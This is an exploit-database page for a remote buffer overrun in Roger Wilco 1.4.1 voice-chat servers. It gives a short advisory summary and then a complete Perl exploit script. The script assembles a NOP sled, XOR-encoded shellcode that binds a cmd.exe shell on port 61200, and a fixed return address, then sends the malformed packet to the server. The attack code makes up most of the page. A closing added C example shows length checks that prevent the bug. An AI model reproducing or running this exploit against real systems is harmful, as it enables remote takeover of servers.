Roger Wilco 1.4.1 – Remote Server Side Buffer Overrun
Vulnerability ID | 1054146 | Vulnerability type | |
Published | 2003-09-08 | Updated | 2003-09-08 |
CVE ID | N/A |
CNNVD ID | N/A |
Platform | Windows | CVSS score | N/A |
Vulnerability details
Vulnerability details have not yet been disclosed.
Exploit (EXP)
source: http://www.securityfocus.com/bid/8566/info
A vulnerability has been reported for various Roger Wilco server releases. The problem occurs server-side, and can be triggered when processing malformed client packets. Specifically, when connecting to a server the Roger Wilco client transmits a packet containing the size of data to be copied into an internal buffer. As a result, a malicious user could modify the size to result in excessive data being copied into a previously allocated buffer. This could ultimately allow for sensitive server memory to be corrupted, potentially resulting in the execution of arbitrary code.
#!/usr/bin/perl
#
# RogerWilco v1.4.1.6 remote buffer overflow exploit
# ...just for fun
#
# Binds cmd.exe shell on port 61200.
# Retaddr 0x0122fa44 will work only if roger.exe has md5
# checksum 89f2d9cda1abc1f55cd06181fbdd6e43 (v.1.4.1.6).
# And it does not matter which win32 operating system is installed
# (winxp/2k/nt/me/9x/03).
# Btw, RogerWilco is a kewl Internet Voice chat for gamers (hm).
# Vendor: rogerwilco.gamespy.com.
# Bug found by Auriemma Luigi (hey dude in da third time ;])
# Advisory: security.nnov.ru/search/document.asp?docid=5074
#
# Greets to all ppl from #m00sec #nerf and #priv8security (EFnet)
#
# d4rkgr3y [[email protected]] // m00 [www.m00.ru]
#
use IO::Socket;

$host = "127.0.0.1";
$port = "3782";

# Return address 0x0122fa44 in little-endian byte order (build-specific, see header).
$retaddr = "\x44\xfa\x22\x01";

$shellcode =
"\x33\xff". #xor edi,edi
"\x33\xf6". #xor esi,esi
"\x33\xdb". #xor ebx,ebx
"\xB8\x01\xF0\x22\x01". #mov eax,122F020
#"\xcc". #int3
"\x83\xC0\x15\x33\xC9\x66\xB9\xD1\x01\x80\x30\x96\x40\xE2\xFA". #decryptor
#winxp/2k xored portbind shellcode
"\x15\x7A\xA2\x1D\x62\x7E\xD1\x97\x96\x96\x1F\x90\x69\xA0\xFE\x18\xD8\x98\x7A\x7E\xF7".
"\x97\x96\x96\x1F\xD0\x9E\x69\xA0\xFE\x3B\x4F\x93\x58\x7E\xC4\x97\x96\x96\x1F\xD0".
"\x9A\xFE\xFA\xFA\x96\x96\xFE\xA5\xA4\xB8\xF2\xFE\xE1\xE5\xA4\xC9\xC2\x69\xC0\x9E".
"\x1F\xD0\x92\x69\xA0\xFE\xE4\x68\x25\x80\x7E\xBB\x97\x96\x96\x1F\xD0\x86\x69\xA0".
"\xFE\xE8\x4E\x74\xE5\x7E\x88\x97\x96\x96\x1F\xD0\x82\x69\xE0\x92\xFE\x5D\x7B\x6A".
"\xAD\x7E\x98\x97\x96\x96\x1F\xD0\x8E\x69\xE0\x92\xFE\x4F\x9F\x63\x3B\x7E\x68\x96".
"\x96\x96\x1F\xD0\x8A\x69\xE0\x92\xFE\x32\x8C\xE6\x51\x7E\x78\x96\x96\x96\x1F\xD0".
"\xB6\x69\xE0\x92\xFE\x32\x3B\xB8\x7F\x7E\x48\x96\x96\x96\x1F\xD0\xB2\x69\xE0\x92".
"\xFE\x73\xDF\x10\xDF\x7E\x58\x96\x96\x96\x1F\xD0\xBE\x69\xE0\x92\xFE\x71\xEF\x50".
"\xEF\x7E\x28\x96\x96\x96\x1F\xD0\xBA\xA5\x69\x17\x7A\x06\x97\x96\x96\xC2\xFE\x97".
"\x97\x96\x96\x69\xC0\x8E\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6\x69\xC0\x8A\x1D\x4E\xC1".
"\xC1\xFE\x94\x96\x79\x86\x1D\x5A\xFC\x80\xC7\xC5\x69\xC0\xB6\xC1\xC5\x69\xC0\xB2".
"\xC1\xC7\xC5\x69\xC0\xBE\x1D\x46\xFE\xF3\xEE\xF3\x96\xFE\xF5\xFB\xF2\xB8\x1F\xF0".
"\xA6\x15\x7A\xC2\x1B\xAA\xB2\xA5\x56\xA5\x5F\x15\x57\x83\x3D\x74\x6B\x50\xD2\xB2".
"\x86\xD2\x68\xD2\xB2\xAB\x1F\xC2\xB2\xDE\x1F\xC2\xB2\xDA\x1F\xC2\xB2\xC6\x1B\xD2".
"\xB2\x86\xC2\xC6\xC7\xC7\xC7\xFC\x97\xC7\xC7\x69\xE0\xA6\xC7\x69\xC0\x86\x1D\x5A".
"\xFC\x69\x69\xA7\x69\xC0\x9A\x1D\x5E\xC1\x69\xC0\xBA\x69\xC0\x82\xC3\xC0\xF2\x37".
"\xA6\x96\x96\x96\x13\x56\xEE\x9A\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\x7D\x9F".
"\x1D\xD6\xA2\x1D\x3E\x2E\x96\x96\x96\x1D\x53\xC8\xCB\x54\x92\x96\xC5\xC3\xC0\xC1".
"\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D\xDC\x8E\x1D\xCC\xB6\x95".
"\x4B\x75\xA4\xDF\x1D\xA2\x1D\x95\x63\xA5\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x91\x57".
"\x59\x9B\x95\x6E\x7D\x64\xAD\xEA\xB2\x82\xE3\x77\x1D\xCC\xB2\x95\x4B\xF0\x1D\x9A".
"\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x94\xA5\x56\x1D\x43\xC9\xC8\xCB".
"\xCD\x54\x92\x96";

# Field value is 1263 bytes total: NOP sled + 490-byte shellcode + 200 trailing NOPs.
for($i=0;$i<1263-200-490;$i++) {
$execode .= "\x90";
}
$execode .= "$shellcode";
for($i=0;$i<200;$i++) {
$execode .= "\x90";
}

print "\n\rRogerWilco v1.4.1.6 remote buffer overflow exploit\n\n=> Connecting to $host:$port.. ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die " damn\n";
print "ok\n=> Sending exploit buffer... ";

# Malformed client packet: header, "channel" field name, an overlong field value
# that overruns the server's fixed buffer, then the return address and trailing fields.
$buf =
"\x0F\x00\x05\x08\x6A\xD6\x4C\x03".
"\x96\xED\x3B\xE7\x88\xE2\xA9\x74".
"channel".
"\x00".
"$execode".
"$retaddr".
"\x0F\x10\x00\x04".
"d4rk".
"\x0F\x11\x00\x04\x00\x00\x00\x02".
"\x0F\x12\x00\x04\x00\x00\x00\x00";
print $socket "$buf";
print "ok\n=> Exiting... \n\n";
sleep(2);
close($socket);
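The bug class behind the advisory and the exploit above is a client-supplied size that the server copies into a fixed buffer without checking it. The following is an added C example, not part of this page or of Roger Wilco's code: the two-byte length-prefixed packet layout, the 64-byte buffer and the sample packets are all assumed or constructed for illustration, and the parser shows the two checks that close the hole.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fixed-size server-side buffer that the client-declared length is copied into (assumed size). */
#define CHANNEL_BUF_SIZE 64

enum { PKT_OK = 0, PKT_TRUNCATED = -1, PKT_LEN_EXCEEDS_PACKET = -2, PKT_LEN_EXCEEDS_BUFFER = -3 };

typedef struct {
    char   channel[CHANNEL_BUF_SIZE];
    size_t len;
} channel_t;

/* Assumed (illustrative) packet layout: [2-byte big-endian length][length bytes of channel name].
 * The vulnerable pattern is memcpy(out->channel, pkt + 2, declared) with no checks at all;
 * the two checks below are what close it. */
int parse_channel_packet(const uint8_t *pkt, size_t pkt_len, channel_t *out)
{
    if (pkt_len < 2)
        return PKT_TRUNCATED;                 /* not even a complete length field */
    size_t declared = ((size_t)pkt[0] << 8) | pkt[1];
    if (declared > pkt_len - 2)
        return PKT_LEN_EXCEEDS_PACKET;        /* declared size exceeds the bytes actually received */
    if (declared >= sizeof out->channel)
        return PKT_LEN_EXCEEDS_BUFFER;        /* would overrun the fixed buffer (keep room for NUL) */
    memcpy(out->channel, pkt + 2, declared);
    out->channel[declared] = '\0';
    out->len = declared;
    return PKT_OK;
}

int main(void)
{
    /* Constructed sample packets: honest, lying about size, and honest but oversized. */
    const uint8_t good[]  = { 0x00, 0x07, 'c', 'h', 'a', 'n', 'n', 'e', 'l' };
    const uint8_t lying[] = { 0x04, 0xEF, 'c', 'h', 'a', 'n', 'n', 'e', 'l' }; /* claims 1263 bytes */
    uint8_t big[2 + 200];
    big[0] = 0x00; big[1] = 200;
    memset(big + 2, 'A', 200);

    channel_t ch;
    printf("good : %d (%s)\n", parse_channel_packet(good, sizeof good, &ch), ch.channel);
    printf("lying: %d\n", parse_channel_packet(lying, sizeof lying, &ch));
    printf("big  : %d\n", parse_channel_packet(big, sizeof big, &ch));
    return 0;
}
```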